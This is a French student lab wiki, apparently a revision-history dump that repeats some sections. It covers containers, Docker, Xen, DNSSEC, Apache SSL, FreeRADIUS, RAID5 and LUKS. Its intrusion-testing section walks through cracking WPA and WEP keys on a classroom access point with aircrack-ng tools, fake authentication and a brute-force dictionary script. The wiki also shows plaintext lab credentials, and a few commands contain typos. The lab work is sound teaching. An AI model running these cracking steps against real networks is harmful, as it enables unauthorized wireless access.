$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.1 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créons ensuite un fichier texte. La suite de cette partie, qui est d'échanger les cartes SD, n'est pas réalisable dans notre cas.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=48921TP sysres IMA5sc 2018/2019 G72018-12-17T17:58:21Z<p>Mcreteur : /* 5. Tests d'intrusion */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1500px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
===Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.1 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créeons ensuite un fichier texte.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Cassagewep07.png&diff=48920Fichier:Cassagewep07.png2018-12-17T17:57:10Z<p>Mcreteur : </p>
<hr />
<div></div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=48911TP sysres IMA5sc 2018/2019 G72018-12-17T17:27:15Z<p>Mcreteur : /* 5. Tests d'intrusion */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
